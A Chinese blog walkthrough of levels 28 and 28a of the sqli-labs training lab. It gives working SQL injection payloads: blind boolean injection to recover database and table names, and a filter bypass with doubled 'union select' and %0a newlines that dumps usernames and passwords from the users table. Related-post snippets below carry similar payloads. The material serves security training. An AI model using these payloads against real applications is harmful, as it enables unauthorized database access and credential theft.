sqli-labs第28关,28a关

已于 2024-07-31 17:37:37 修改
阅读量298 收藏 2
点赞数 11
分类专栏: sqli-labs 文章标签: 数据库 mysql sql
于 2024-07-31 17:35:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/140802478
版权

第28关

判断注入类型 

?id=2%0aand%0a1=1
?id=2%0aand%0a1=2

结果均返回正常,为字符型注入,尝试单引号、双引号、括号等注入,发现为')注入

?id=2')%0aand%0a('1'='1

此关出错,却没有报错信息,可以采用盲注

1.盲注

判断数据库长度:

?id=2%27)%0aand%0alength(database())=8%0aand%0a(%271%27=%271

 判断数据库

?id=2')%0aand%0aascii(mid(database(),1,1))=115%0aand%0a('1'='1

以此类推,得出库名为security

判断表名

?id=2%27)%0aand%0aascii(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a0,1),1,1))=101%0aand%0a(%271%27=%271

以此类推,得出第一个表名为email;

?id=2%27)%0aand%0aascii(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a1,1),1,1))=114%0aand%0a(%271%27=%271

得出第2个表名为referes ;

......得出剩余表名uagents,users

2.采用联合

这关主要点是union select被过滤,不是单纯的过滤union,select

绕过union select,得出回显点

?id=0')%0aunionunion%0aselect%0aselect%0a1,2,3%0aand%0a('1'='1

得出数据库

?id=0%27)%0aunionunion%0aselect%0aselect%0a1,database(),3%0aand%0a(%271%27=%271

得出表名

?id=0%27)%0aunionunion%0aselect%0aselect%0a1,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()),3%0aand%0a(%271%27=%271

得出列名

?id=0%27)%0aunionunion%0aselect%0aselect%0a1,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database()%0aand%0atable_name=%27users%27),3%0aand%0a(%271%27=%271

得出用户名,密码

?id=0%27)%0aunionunion%0aselect%0aselect%0a1,(select%0agroup_concat(username,%27:%27,password)%0afrom%0ausers),3%0aand%0a(%271%27=%271

第28a关

这一关为')字符型注入,也是没有报错信息,方法与28关差不多,好处是空格没过滤

?id=2%27)%20and%20(%271%27=%271

有点小奇怪,看了主页面,按理说28关应该给出报错信息,毕竟标题写的是基于报错

查看28关源码,报错信息被注释

把注释去掉,就有报错信息

熊熊爱吃不胖
关注
专栏目录
SQLi Labs Lesson28 & Lesson28a
1ame的博客
08-23 355
Lesson - 28a GET - Error Based - All your UNION & SELECT Belong to US - String - Single Quotes with parenthesis 欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果没有任何信息,应该是闭了错误错误回显。 构造 ?id=1" z
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1757
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQL-labs的第28——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 405
的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该不返回错误,所以不使用?id=1\,而且也不使用报错注入。
sqli-labs/Less-28
m0_71299382的博客
11-20 367
sqli-labs第二十八a
Sqlilabs-28
KAKA的博客
07-14 450
因为是 Winodws 那就盲注吧,这跟 26a27a 卡一样, payload 改改就可以用了,这一同样把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl
sqli-labs(28)---原创原创自此一家
weixin_30437847的博客
05-29 690
0X01构造闭合 ’报错 )报错 其他不报错 那我们猜想是不是')的闭合 ?id=1')||('1')=('1 返回正确 那么好像猜对了 0X02爆表名 过滤了相连接的union和select ?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('1')=('1 这里过滤了相连接的union select 那咋办呐? ...
sqli-labs Less-26、26a、27、27a、2828asqli-labs闯指南 26、26a、27、27a、2828a)—Advanced injection
m0_54899775的博客
12-25 1371
sqli-labs Less-26、26a、27、27a、2828asqli-labs闯指南 26、26a、27、27a、2828a)—Advanced injection
CTFshow-sqli-labs
Leo8283的博客
04-20 757
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs(23-28a
ximo的博客
02-04 332
目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28a Less-23 这一按照一般的步骤操作时,发现使用 # --+等注释符并不能起到作用,查看源码,发现: 注释符都被过滤为空,这里有两种选择: 1.不使用注释符,使用 ’ 构造语句将后面的 ’ 闭合。 ?id=' union select 1,2,database() ' 2.使用;%00进行截断(MySQL特有) 以上两种方式皆可。 注意:使用第一
sqli-labs-php7环境搭建及通记录
weixin_44644249的博客
10-28 1814
sqli-labs-php7环境搭建及通记录 sqli-labs-php7环境搭建及通记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1547
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1151
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
sqli-labs通28-31
m0_62207170的博客
02-27 137
sqli-labs通28-31
sqli.labs靶场(2328a
喜欢创作各种技术类文章,希望可以帮到你
02-01 1310
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
Sqlilabs-28a
KAKA的博客
07-14 226
28a 在这里 ????
sqllab第二十八笔记(附带28a)
最新发布
I_WORM的博客
03-17 353
构造payload:id=0%27)union%09all%09select%091,database(),3%09=(%271。重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271。构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271。页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容。好,尝试进行错误注入。
sqli-labs (less-28 and less-28a)
kukudeshuo的博客
03-12 974
sqli-labs (less-28 and less-28a) less-28 进入28,输入ID=1 查看源代码 这里发现基本与27一样,依然采用大小写混合绕过 http://127.0.0.1/sql1/Less-28/?id=1' #回显错误 http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示 判断闭合方式为’);%00,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-28/?id=111') %a0 Un
(手工)【sqli-labs2828a】字符型注入、盲注、过滤
07-14 1131
SQL-字符型注入、盲注、过滤】
sqli-labs-less-23~28
giun的博客
02-14 571
Less-23 过滤了#,–,那么我们需要采用闭合引号方式进行注入, http://127.0.0.1/sqli-labs-master/Less-23/?id=-1%27%20union%20select%201,@@basedir,%273 http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,@@datadir...
sqli-labs闯
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值